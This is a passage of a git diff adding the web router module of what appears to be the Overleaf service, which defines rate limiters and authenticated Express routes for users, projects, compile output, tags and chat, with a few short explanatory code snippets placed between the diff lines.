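  'example-test': [{ variantName: 'enabled', assignedAt: '2025-04-24T00:00:00Z' }],
})
console.log(splitTests['example-test'][0].assignedAt instanceof Date) // true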
UserFeatureUsageSchema diff --git a/services/web/app/src/router.mjs b/services/web/app/src/router.mjs new file mode 100644 index 0000000..5e1a21c --- /dev/null +++ b/services/web/app/src/router.mjs @@ -0,0 +1,1266 @@ +import AdminController from './Features/ServerAdmin/AdminController.js' +import ErrorController from './Features/Errors/ErrorController.js' +import Features from './infrastructure/Features.js' +import ProjectController from './Features/Project/ProjectController.js' +import ProjectApiController from './Features/Project/ProjectApiController.mjs' +import ProjectListController from './Features/Project/ProjectListController.mjs' +import SpellingController from './Features/Spelling/SpellingController.mjs' +import EditorRouter from './Features/Editor/EditorRouter.mjs' +import Settings from '@overleaf/settings' +import TpdsController from './Features/ThirdPartyDataStore/TpdsController.mjs' +import SubscriptionRouter from './Features/Subscription/SubscriptionRouter.mjs' +import UploadsRouter from './Features/Uploads/UploadsRouter.mjs' +import metrics from '@overleaf/metrics' +import ReferalController from './Features/Referal/ReferalController.mjs' +import AuthenticationController from './Features/Authentication/AuthenticationController.js' +import PermissionsController from './Features/Authorization/PermissionsController.js' +import SessionManager from './Features/Authentication/SessionManager.js' +import TagsController from './Features/Tags/TagsController.mjs' +import NotificationsController from './Features/Notifications/NotificationsController.mjs' +import CollaboratorsRouter from './Features/Collaborators/CollaboratorsRouter.mjs' +import UserInfoController from './Features/User/UserInfoController.js' +import UserController from './Features/User/UserController.js' +import UserEmailsController from './Features/User/UserEmailsController.js' +import UserPagesController from './Features/User/UserPagesController.mjs' +import TutorialController from './Features/Tutorial/TutorialController.mjs' +import DocumentController from './Features/Documents/DocumentController.mjs' +import CompileManager from './Features/Compile/CompileManager.js' +import CompileController from './Features/Compile/CompileController.js' +import ClsiCookieManagerFactory from './Features/Compile/ClsiCookieManager.js' +import HealthCheckController from './Features/HealthCheck/HealthCheckController.mjs' +import ProjectDownloadsController from './Features/Downloads/ProjectDownloadsController.mjs' +import FileStoreController from './Features/FileStore/FileStoreController.mjs' +import DocumentUpdaterController from './Features/DocumentUpdater/DocumentUpdaterController.mjs' +import HistoryRouter from './Features/History/HistoryRouter.mjs' +import ExportsController from './Features/Exports/ExportsController.mjs' +import PasswordResetRouter from './Features/PasswordReset/PasswordResetRouter.mjs' +import StaticPagesRouter from './Features/StaticPages/StaticPagesRouter.mjs' +import ChatController from './Features/Chat/ChatController.js' +import Modules from './infrastructure/Modules.js' +import { + RateLimiter, + openProjectRateLimiter, + overleafLoginRateLimiter, +} from './infrastructure/RateLimiter.js' +import RateLimiterMiddleware from './Features/Security/RateLimiterMiddleware.js' +import InactiveProjectController from './Features/InactiveData/InactiveProjectController.mjs' +import ContactRouter from './Features/Contacts/ContactRouter.mjs' +import ReferencesController from './Features/References/ReferencesController.mjs' 
+import AuthorizationMiddleware from './Features/Authorization/AuthorizationMiddleware.js' +import BetaProgramController from './Features/BetaProgram/BetaProgramController.mjs' +import AnalyticsRouter from './Features/Analytics/AnalyticsRouter.mjs' +import MetaController from './Features/Metadata/MetaController.mjs' +import TokenAccessController from './Features/TokenAccess/TokenAccessController.mjs' +import TokenAccessRouter from './Features/TokenAccess/TokenAccessRouter.mjs' +import LinkedFilesRouter from './Features/LinkedFiles/LinkedFilesRouter.mjs' +import TemplatesRouter from './Features/Templates/TemplatesRouter.js' +import UserMembershipRouter from './Features/UserMembership/UserMembershipRouter.mjs' +import SystemMessageController from './Features/SystemMessages/SystemMessageController.js' +import AnalyticsRegistrationSourceMiddleware from './Features/Analytics/AnalyticsRegistrationSourceMiddleware.js' +import AnalyticsUTMTrackingMiddleware from './Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs' +import CaptchaMiddleware from './Features/Captcha/CaptchaMiddleware.js' +import { Joi, validate } from './infrastructure/Validation.js' +import UnsupportedBrowserMiddleware from './infrastructure/UnsupportedBrowserMiddleware.js' +import logger from '@overleaf/logger' +import _ from 'lodash' +import { plainTextResponse } from './infrastructure/Response.js' +import PublicAccessLevels from './Features/Authorization/PublicAccessLevels.js' +import SocketDiagnostics from './Features/SocketDiagnostics/SocketDiagnostics.mjs' +import ClsiCacheController from './Features/Compile/ClsiCacheController.js' +const ClsiCookieManager = ClsiCookieManagerFactory( + Settings.apis.clsi != null ? Settings.apis.clsi.backendGroupName : undefined +) +const { renderUnsupportedBrowserPage, unsupportedBrowserMiddleware } = + UnsupportedBrowserMiddleware + +const rateLimiters = { + addEmail: new RateLimiter('add-email', { + points: 10, + duration: 60, + }), + addProjectToTag: new RateLimiter('add-project-to-tag', { + points: 30, + duration: 60, + }), + addProjectsToTag: new RateLimiter('add-projects-to-tag', { + points: 30, + duration: 60, + }), + canSkipCaptcha: new RateLimiter('can-skip-captcha', { + points: 20, + duration: 60, + }), + changePassword: new RateLimiter('change-password', { + points: 10, + duration: 60, + }), + compileProjectHttp: new RateLimiter('compile-project-http', { + points: 800, + duration: 60 * 60, + }), + confirmEmail: new RateLimiter('confirm-email', { + points: 10, + duration: 60, + }), + createProject: new RateLimiter('create-project', { + points: 20, + duration: 60, + }), + createTag: new RateLimiter('create-tag', { + points: 30, + duration: 60, + }), + deleteEmail: new RateLimiter('delete-email', { + points: 10, + duration: 60, + }), + deleteTag: new RateLimiter('delete-tag', { + points: 30, + duration: 60, + }), + deleteUser: new RateLimiter('delete-user', { + points: 10, + duration: 60, + }), + endorseEmail: new RateLimiter('endorse-email', { + points: 30, + duration: 60, + }), + getProjects: new RateLimiter('get-projects', { + points: 30, + duration: 60, + }), + grantTokenAccessReadOnly: new RateLimiter('grant-token-access-read-only', { + points: 10, + duration: 60, + }), + grantTokenAccessReadWrite: new RateLimiter('grant-token-access-read-write', { + points: 10, + duration: 60, + }), + indexAllProjectReferences: new RateLimiter('index-all-project-references', { + points: 30, + duration: 60, + }), + miscOutputDownload: new RateLimiter('misc-output-download', { + points: 1000, 
+ duration: 60 * 60, + }), + multipleProjectsZipDownload: new RateLimiter( + 'multiple-projects-zip-download', + { + points: 10, + duration: 60, + } + ), + openDashboard: new RateLimiter('open-dashboard', { + points: 30, + duration: 60, + }), + readAndWriteToken: new RateLimiter('read-and-write-token', { + points: 15, + duration: 60, + }), + readOnlyToken: new RateLimiter('read-only-token', { + points: 15, + duration: 60, + }), + removeProjectFromTag: new RateLimiter('remove-project-from-tag', { + points: 30, + duration: 60, + }), + removeProjectsFromTag: new RateLimiter('remove-projects-from-tag', { + points: 30, + duration: 60, + }), + renameTag: new RateLimiter('rename-tag', { + points: 30, + duration: 60, + }), + resendConfirmation: new RateLimiter('resend-confirmation', { + points: 1, + duration: 60, + }), + sendConfirmation: new RateLimiter('send-confirmation', { + points: 1, + duration: 60, + }), + sendChatMessage: new RateLimiter('send-chat-message', { + points: 100, + duration: 60, + }), + statusCompiler: new RateLimiter('status-compiler', { + points: 10, + duration: 60, + }), + zipDownload: new RateLimiter('zip-download', { + points: 10, + duration: 60, + }), +} + +async function initialize(webRouter, privateApiRouter, publicApiRouter) { + webRouter.use(unsupportedBrowserMiddleware) + + if (!Settings.allowPublicAccess) { + webRouter.all('*', AuthenticationController.requireGlobalLogin) + } + + webRouter.get('*', AnalyticsRegistrationSourceMiddleware.setInbound()) + webRouter.get('*', AnalyticsUTMTrackingMiddleware.recordUTMTags()) + + // Mount onto /login in order to get the deviceHistory cookie. + webRouter.post( + '/login/can-skip-captcha', + // Keep in sync with the overleaf-login options. + RateLimiterMiddleware.rateLimit(rateLimiters.canSkipCaptcha), + CaptchaMiddleware.canSkipCaptcha + ) + + webRouter.get('/login', UserPagesController.loginPage) + AuthenticationController.addEndpointToLoginWhitelist('/login') + + webRouter.post( + '/login', + RateLimiterMiddleware.rateLimit(overleafLoginRateLimiter), // rate limit IP (20 / 60s) + RateLimiterMiddleware.loginRateLimitEmail(), // rate limit email (10 / 120s) + CaptchaMiddleware.validateCaptcha('login'), + AuthenticationController.passportLogin + ) + + webRouter.get( + '/compromised-password', + AuthenticationController.requireLogin(), + UserPagesController.compromisedPasswordPage + ) + + webRouter.get('/account-suspended', UserPagesController.accountSuspended) + + webRouter.get( + '/socket-diagnostics', + AuthenticationController.requireLogin(), + SocketDiagnostics.index + ) + + if (Settings.enableLegacyLogin) { + AuthenticationController.addEndpointToLoginWhitelist('/login/legacy') + webRouter.get('/login/legacy', UserPagesController.loginPage) + webRouter.post( + '/login/legacy', + RateLimiterMiddleware.rateLimit(overleafLoginRateLimiter), // rate limit IP (20 / 60s) + RateLimiterMiddleware.loginRateLimitEmail(), // rate limit email (10 / 120s) + CaptchaMiddleware.validateCaptcha('login'), + AuthenticationController.passportLogin + ) + } + + webRouter.get( + '/read-only/one-time-login', + UserPagesController.oneTimeLoginPage + ) + AuthenticationController.addEndpointToLoginWhitelist( + '/read-only/one-time-login' + ) + + webRouter.post('/logout', UserController.logout) + + webRouter.get('/restricted', AuthorizationMiddleware.restricted) + + if (Features.hasFeature('registration-page')) { + webRouter.get('/register', UserPagesController.registerPage) + AuthenticationController.addEndpointToLoginWhitelist('/register') + } + + 
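Every limiter above follows the same convention: `points` operations allowed per `duration` seconds per key. A hypothetical wiring to show the shape (the route itself is invented; the middleware and limiter names match those defined above):

// Invented example route: allow 30 requests per 60 s per client, as with create-tag.
webRouter.post(
  '/example/action',
  RateLimiterMiddleware.rateLimit(rateLimiters.createTag),
  (req, res) => res.sendStatus(204)
)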
EditorRouter.apply(webRouter, privateApiRouter) + CollaboratorsRouter.apply(webRouter, privateApiRouter) + SubscriptionRouter.apply(webRouter, privateApiRouter, publicApiRouter) + UploadsRouter.apply(webRouter, privateApiRouter) + PasswordResetRouter.apply(webRouter, privateApiRouter) + StaticPagesRouter.apply(webRouter, privateApiRouter) + ContactRouter.apply(webRouter, privateApiRouter) + AnalyticsRouter.apply(webRouter, privateApiRouter, publicApiRouter) + LinkedFilesRouter.apply(webRouter, privateApiRouter, publicApiRouter) + TemplatesRouter.apply(webRouter) + UserMembershipRouter.apply(webRouter) + TokenAccessRouter.apply(webRouter) + HistoryRouter.apply(webRouter, privateApiRouter) + + await Modules.applyRouter(webRouter, privateApiRouter, publicApiRouter) + + if (Settings.enableSubscriptions) { + webRouter.get( + '/user/bonus', + AuthenticationController.requireLogin(), + ReferalController.bonus + ) + } + + // .getMessages will generate an empty response for anonymous users. + webRouter.get('/system/messages', SystemMessageController.getMessages) + + webRouter.get( + '/user/settings', + AuthenticationController.requireLogin(), + PermissionsController.useCapabilities(), + UserPagesController.settingsPage + ) + webRouter.post( + '/user/settings', + AuthenticationController.requireLogin(), + validate({ + body: Joi.object({ + first_name: Joi.string().allow(null, '').max(255), + last_name: Joi.string().allow(null, '').max(255), + }).unknown(), + }), + UserController.updateUserSettings + ) + webRouter.post( + '/user/password/update', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.changePassword), + PermissionsController.requirePermission('change-password'), + UserController.changePassword + ) + webRouter.get( + '/user/emails', + AuthenticationController.requireLogin(), + PermissionsController.useCapabilities(), + UserController.ensureAffiliationMiddleware, + UserEmailsController.list + ) + webRouter.get( + '/user/emails/confirm', + AuthenticationController.requireLogin(), + UserEmailsController.showConfirm + ) + webRouter.post( + '/user/emails/confirm', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.confirmEmail), + UserEmailsController.confirm + ) + + webRouter.post( + '/user/emails/send-confirmation-code', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.sendConfirmation), + UserEmailsController.sendExistingSecondaryEmailConfirmationCode + ) + + webRouter.post( + '/user/emails/resend-confirmation-code', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.resendConfirmation), + UserEmailsController.resendExistingSecondaryEmailConfirmationCode + ) + + webRouter.post( + '/user/emails/confirm-code', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.confirmEmail), + UserEmailsController.checkExistingEmailConfirmationCode + ) + + webRouter.post( + '/user/emails/resend_confirmation', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.resendConfirmation), + await Modules.middleware('resendConfirmationEmail'), + UserEmailsController.resendConfirmation + ) + + webRouter.get( + '/user/emails/primary-email-check', + AuthenticationController.requireLogin(), + UserEmailsController.primaryEmailCheckPage + ) + + webRouter.post( + '/user/emails/primary-email-check', + AuthenticationController.requireLogin(), + PermissionsController.useCapabilities(), + 
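The validate() middleware above takes a Joi schema for the request body. A standalone check of the POST /user/settings schema, assuming the standard joi package behaves like the project's re-export in infrastructure/Validation:

const Joi = require('joi') // assumption: same semantics as the re-exported Joi

const body = Joi.object({
  first_name: Joi.string().allow(null, '').max(255),
  last_name: Joi.string().allow(null, '').max(255),
}).unknown() // unknown keys are tolerated

console.log(body.validate({ first_name: 'Ada', theme: 'dark' }).error) // undefined
console.log(Boolean(body.validate({ first_name: 'x'.repeat(300) }).error)) // true: exceeds max(255)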
UserEmailsController.primaryEmailCheck + ) + + if (Features.hasFeature('affiliations')) { + webRouter.post( + '/user/emails', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('add-secondary-email'), + RateLimiterMiddleware.rateLimit(rateLimiters.addEmail), + CaptchaMiddleware.validateCaptcha('addEmail'), + UserEmailsController.add + ) + + webRouter.post( + '/user/emails/delete', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.deleteEmail), + await Modules.middleware('userDeleteEmail'), + UserEmailsController.remove + ) + webRouter.post( + '/user/emails/default', + AuthenticationController.requireLogin(), + UserEmailsController.setDefault + ) + webRouter.post( + '/user/emails/endorse', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('endorse-email'), + RateLimiterMiddleware.rateLimit(rateLimiters.endorseEmail), + UserEmailsController.endorse + ) + } + + if (Features.hasFeature('saas')) { + webRouter.get( + '/user/emails/add-secondary', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('add-secondary-email'), + UserEmailsController.addSecondaryEmailPage + ) + + webRouter.get( + '/user/emails/confirm-secondary', + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('add-secondary-email'), + UserEmailsController.confirmSecondaryEmailPage + ) + } + + webRouter.get( + '/user/sessions', + AuthenticationController.requireLogin(), + UserPagesController.sessionsPage + ) + webRouter.post( + '/user/sessions/clear', + AuthenticationController.requireLogin(), + UserController.clearSessions + ) + + // deprecated + webRouter.delete( + '/user/newsletter/unsubscribe', + AuthenticationController.requireLogin(), + UserController.unsubscribe + ) + + webRouter.post( + '/user/newsletter/unsubscribe', + AuthenticationController.requireLogin(), + UserController.unsubscribe + ) + + webRouter.post( + '/user/newsletter/subscribe', + AuthenticationController.requireLogin(), + UserController.subscribe + ) + + webRouter.get( + '/user/email-preferences', + AuthenticationController.requireLogin(), + UserPagesController.emailPreferencesPage + ) + + webRouter.post( + '/user/delete', + RateLimiterMiddleware.rateLimit(rateLimiters.deleteUser), + AuthenticationController.requireLogin(), + PermissionsController.requirePermission('delete-own-account'), + UserController.tryDeleteUser + ) + + webRouter.get( + '/user/personal_info', + AuthenticationController.requireLogin(), + UserInfoController.getLoggedInUsersPersonalInfo + ) + privateApiRouter.get( + '/user/:user_id/personal_info', + AuthenticationController.requirePrivateApiAuth(), + UserInfoController.getPersonalInfo + ) + + webRouter.get( + '/user/reconfirm', + UserPagesController.renderReconfirmAccountPage + ) + // for /user/reconfirm POST, see password router + + webRouter.get( + '/user/tpds/queues', + AuthenticationController.requireLogin(), + TpdsController.getQueues + ) + + webRouter.post( + '/tutorial/:tutorialKey/complete', + AuthenticationController.requireLogin(), + TutorialController.completeTutorial + ) + + webRouter.post( + '/tutorial/:tutorialKey/postpone', + AuthenticationController.requireLogin(), + TutorialController.postponeTutorial + ) + + webRouter.get( + '/user/projects', + AuthenticationController.requireLogin(), + ProjectController.userProjectsJson + ) + webRouter.get( + '/project/:Project_id/entities', + AuthenticationController.requireLogin(), + 
AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.projectEntitiesJson + ) + + webRouter.get( + '/project', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.openDashboard), + PermissionsController.useCapabilities(), + ProjectListController.projectListPage + ) + webRouter.post( + '/project/new', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.createProject), + ProjectController.newProject + ) + webRouter.post( + '/api/project', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.getProjects), + ProjectListController.getProjectsJson + ) + + for (const route of [ + // Keep the old route for continuous metrics + '/Project/:Project_id', + // New route for pdf-detach + '/Project/:Project_id/:detachRole(detacher|detached)', + ]) { + webRouter.get( + route, + RateLimiterMiddleware.rateLimit(openProjectRateLimiter, { + params: ['Project_id'], + }), + PermissionsController.useCapabilities(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.loadEditor + ) + } + webRouter.head( + '/Project/:Project_id/file/:File_id', + AuthorizationMiddleware.ensureUserCanReadProject, + FileStoreController.getFileHead + ) + webRouter.get( + '/Project/:Project_id/file/:File_id', + AuthorizationMiddleware.ensureUserCanReadProject, + FileStoreController.getFile + ) + + webRouter.get( + '/Project/:Project_id/doc/:Doc_id/download', // "download" suffix to avoid conflict with private API route at doc/:doc_id + AuthorizationMiddleware.ensureUserCanReadProject, + DocumentUpdaterController.getDoc + ) + webRouter.post( + '/project/:Project_id/settings', + validate({ + body: Joi.object({ + publicAccessLevel: Joi.string() + .valid(PublicAccessLevels.PRIVATE, PublicAccessLevels.TOKEN_BASED) + .optional(), + }), + }), + AuthorizationMiddleware.ensureUserCanWriteProjectSettings, + ProjectController.updateProjectSettings + ) + webRouter.post( + '/project/:Project_id/settings/admin', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.updateProjectAdminSettings + ) + + webRouter.post( + '/project/:Project_id/compile', + RateLimiterMiddleware.rateLimit(rateLimiters.compileProjectHttp, { + params: ['Project_id'], + }), + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.compile + ) + + webRouter.post( + '/project/:Project_id/compile/stop', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.stopCompile + ) + + webRouter.get( + '/project/:Project_id/output/cached/output.overleaf.json', + AuthorizationMiddleware.ensureUserCanReadProject, + ClsiCacheController.getLatestBuildFromCache + ) + + webRouter.get( + '/download/project/:Project_id/build/:buildId/output/cached/:filename', + AuthorizationMiddleware.ensureUserCanReadProject, + ClsiCacheController.downloadFromCache + ) + + // PDF Download button for specific build + webRouter.get( + '/download/project/:Project_id/build/:build_id/output/output.pdf', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.downloadPdf + ) + + // Align with limits defined in CompileController.downloadPdf + const rateLimiterMiddlewareOutputFiles = RateLimiterMiddleware.rateLimit( + rateLimiters.miscOutputDownload, + { params: ['Project_id'] } + ) + + // direct url access to output files for a specific build + webRouter.get( + /^\/project\/([^/]*)\/build\/([0-9a-f-]+)\/output\/(.*)$/, + function (req, res, next) { + const params = 
{ + Project_id: req.params[0], + build_id: req.params[1], + file: req.params[2], + } + req.params = params + next() + }, + rateLimiterMiddlewareOutputFiles, + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.getFileFromClsi + ) + + // direct url access to output files for a specific user and build + webRouter.get( + /^\/project\/([^/]*)\/user\/([0-9a-f]+)\/build\/([0-9a-f-]+)\/output\/(.*)$/, + function (req, res, next) { + const params = { + Project_id: req.params[0], + user_id: req.params[1], + build_id: req.params[2], + file: req.params[3], + } + req.params = params + next() + }, + rateLimiterMiddlewareOutputFiles, + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.getFileFromClsi + ) + + webRouter.delete( + '/project/:Project_id/output', + validate({ query: { clsiserverid: Joi.string() } }), + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.deleteAuxFiles + ) + webRouter.get( + '/project/:Project_id/sync/code', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.proxySyncCode + ) + webRouter.get( + '/project/:Project_id/sync/pdf', + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.proxySyncPdf + ) + webRouter.get( + '/project/:Project_id/wordcount', + validate({ query: { clsiserverid: Joi.string() } }), + AuthorizationMiddleware.ensureUserCanReadProject, + CompileController.wordCount + ) + + webRouter.post( + '/Project/:Project_id/archive', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.archiveProject + ) + webRouter.delete( + '/Project/:Project_id/archive', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.unarchiveProject + ) + webRouter.post( + '/project/:project_id/trash', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.trashProject + ) + webRouter.delete( + '/project/:project_id/trash', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.untrashProject + ) + + webRouter.delete( + '/Project/:Project_id', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.deleteProject + ) + + webRouter.post( + '/Project/:Project_id/restore', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.restoreProject + ) + webRouter.post( + '/Project/:Project_id/clone', + AuthorizationMiddleware.ensureUserCanReadProject, + ProjectController.cloneProject + ) + + webRouter.post( + '/project/:Project_id/rename', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + ProjectController.renameProject + ) + webRouter.post( + '/project/:project_id/export/:brand_variation_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ExportsController.exportProject + ) + webRouter.get( + '/project/:project_id/export/:export_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ExportsController.exportStatus + ) + webRouter.get( + '/project/:project_id/export/:export_id/:type', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ExportsController.exportDownload + ) + + webRouter.get( + '/Project/:Project_id/download/zip', + RateLimiterMiddleware.rateLimit(rateLimiters.zipDownload, { + params: ['Project_id'], + }), + 
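Express exposes unnamed capture groups from regex routes as req.params[0], req.params[1], and so on; the inline middleware above renames them so the rest of the chain can keep using named params like Project_id. Restated on its own:

function nameOutputFileParams(req, res, next) {
  // for /^\/project\/([^/]*)\/build\/([0-9a-f-]+)\/output\/(.*)$/
  req.params = {
    Project_id: req.params[0],
    build_id: req.params[1],
    file: req.params[2],
  }
  next()
}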
AuthorizationMiddleware.ensureUserCanReadProject, + ProjectDownloadsController.downloadProject + ) + webRouter.get( + '/project/download/zip', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.multipleProjectsZipDownload), + AuthorizationMiddleware.ensureUserCanReadMultipleProjects, + ProjectDownloadsController.downloadMultipleProjects + ) + + webRouter.get( + '/project/:project_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, + Settings.allowAnonymousReadAndWriteSharing + ? (req, res, next) => { + next() + } + : AuthenticationController.requireLogin(), + MetaController.getMetadata + ) + webRouter.post( + '/project/:project_id/doc/:doc_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, + Settings.allowAnonymousReadAndWriteSharing + ? (req, res, next) => { + next() + } + : AuthenticationController.requireLogin(), + MetaController.broadcastMetadataForDoc + ) + privateApiRouter.post( + '/internal/expire-deleted-projects-after-duration', + AuthenticationController.requirePrivateApiAuth(), + ProjectController.expireDeletedProjectsAfterDuration + ) + privateApiRouter.post( + '/internal/expire-deleted-users-after-duration', + AuthenticationController.requirePrivateApiAuth(), + UserController.expireDeletedUsersAfterDuration + ) + privateApiRouter.post( + '/internal/project/:projectId/expire-deleted-project', + AuthenticationController.requirePrivateApiAuth(), + ProjectController.expireDeletedProject + ) + privateApiRouter.post( + '/internal/users/:userId/expire', + AuthenticationController.requirePrivateApiAuth(), + UserController.expireDeletedUser + ) + + privateApiRouter.get( + '/user/:userId/tag', + AuthenticationController.requirePrivateApiAuth(), + TagsController.apiGetAllTags + ) + webRouter.get( + '/tag', + AuthenticationController.requireLogin(), + TagsController.getAllTags + ) + webRouter.post( + '/tag', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.createTag), + validate({ + body: Joi.object({ + name: Joi.string().required(), + color: Joi.string(), + }), + }), + TagsController.createTag + ) + webRouter.post( + '/tag/:tagId/rename', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.renameTag), + validate({ + body: Joi.object({ + name: Joi.string().required(), + }), + }), + TagsController.renameTag + ) + webRouter.post( + '/tag/:tagId/edit', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.renameTag), + validate({ + body: Joi.object({ + name: Joi.string().required(), + color: Joi.string(), + }), + }), + TagsController.editTag + ) + webRouter.delete( + '/tag/:tagId', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.deleteTag), + TagsController.deleteTag + ) + webRouter.post( + '/tag/:tagId/project/:projectId', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.addProjectToTag), + TagsController.addProjectToTag + ) + webRouter.post( + '/tag/:tagId/projects', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.addProjectsToTag), + validate({ + body: Joi.object({ + projectIds: Joi.array().items(Joi.string()).required(), + }), + }), + TagsController.addProjectsToTag + ) + webRouter.delete( + '/tag/:tagId/project/:projectId', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.removeProjectFromTag), + TagsController.removeProjectFromTag + ) + 
webRouter.post( + '/tag/:tagId/projects/remove', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.removeProjectsFromTag), + validate({ + body: Joi.object({ + projectIds: Joi.array().items(Joi.string()).required(), + }), + }), + TagsController.removeProjectsFromTag + ) + + webRouter.get( + '/notifications', + AuthenticationController.requireLogin(), + NotificationsController.getAllUnreadNotifications + ) + webRouter.delete( + '/notifications/:notificationId', + AuthenticationController.requireLogin(), + NotificationsController.markNotificationAsRead + ) + + // Deprecated in favour of /internal/project/:project_id but still used by versioning + privateApiRouter.get( + '/project/:project_id/details', + AuthenticationController.requirePrivateApiAuth(), + ProjectApiController.getProjectDetails + ) + + // New 'stable' /internal API end points + privateApiRouter.get( + '/internal/project/:project_id', + AuthenticationController.requirePrivateApiAuth(), + ProjectApiController.getProjectDetails + ) + privateApiRouter.get( + '/internal/project/:Project_id/zip', + AuthenticationController.requirePrivateApiAuth(), + ProjectDownloadsController.downloadProject + ) + privateApiRouter.get( + '/internal/project/:project_id/compile/pdf', + AuthenticationController.requirePrivateApiAuth(), + CompileController.compileAndDownloadPdf + ) + + privateApiRouter.post( + '/internal/deactivateOldProjects', + AuthenticationController.requirePrivateApiAuth(), + InactiveProjectController.deactivateOldProjects + ) + privateApiRouter.post( + '/internal/project/:project_id/deactivate', + AuthenticationController.requirePrivateApiAuth(), + InactiveProjectController.deactivateProject + ) + + privateApiRouter.get( + '/project/:Project_id/doc/:doc_id', + AuthenticationController.requirePrivateApiAuth(), + DocumentController.getDocument + ) + privateApiRouter.post( + '/project/:Project_id/doc/:doc_id', + AuthenticationController.requirePrivateApiAuth(), + DocumentController.setDocument + ) + + privateApiRouter.post( + '/user/:user_id/project/new', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.createProject + ) + privateApiRouter.post( + '/tpds/folder-update', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.updateFolder + ) + privateApiRouter.post( + '/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.mergeUpdate + ) + privateApiRouter.delete( + '/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.deleteUpdate + ) + privateApiRouter.post( + '/project/:project_id/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.mergeUpdate + ) + privateApiRouter.delete( + '/project/:project_id/user/:user_id/update/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.deleteUpdate + ) + + privateApiRouter.post( + '/project/:project_id/contents/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.updateProjectContents + ) + privateApiRouter.delete( + '/project/:project_id/contents/*', + AuthenticationController.requirePrivateApiAuth(), + TpdsController.deleteProjectContents + ) + + webRouter.post( + '/spelling/learn', + validate({ + body: Joi.object({ + word: Joi.string().required(), + }), + }), + AuthenticationController.requireLogin(), + SpellingController.learn + ) + + webRouter.post( + '/spelling/unlearn', + validate({ + body: Joi.object({ + word: Joi.string().required(), + }), + }), + 
AuthenticationController.requireLogin(), + SpellingController.unlearn + ) + + if (Features.hasFeature('chat')) { + webRouter.get( + '/project/:project_id/messages', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + PermissionsController.requirePermission('chat'), + ChatController.getMessages + ) + webRouter.post( + '/project/:project_id/messages', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + PermissionsController.requirePermission('chat'), + RateLimiterMiddleware.rateLimit(rateLimiters.sendChatMessage), + ChatController.sendMessage + ) + } + + webRouter.post( + '/project/:Project_id/references/indexAll', + AuthorizationMiddleware.ensureUserCanReadProject, + RateLimiterMiddleware.rateLimit(rateLimiters.indexAllProjectReferences), + ReferencesController.indexAll + ) + + // disable beta program while v2 is in beta + webRouter.get( + '/beta/participate', + AuthenticationController.requireLogin(), + BetaProgramController.optInPage + ) + webRouter.post( + '/beta/opt-in', + AuthenticationController.requireLogin(), + BetaProgramController.optIn + ) + webRouter.post( + '/beta/opt-out', + AuthenticationController.requireLogin(), + BetaProgramController.optOut + ) + + 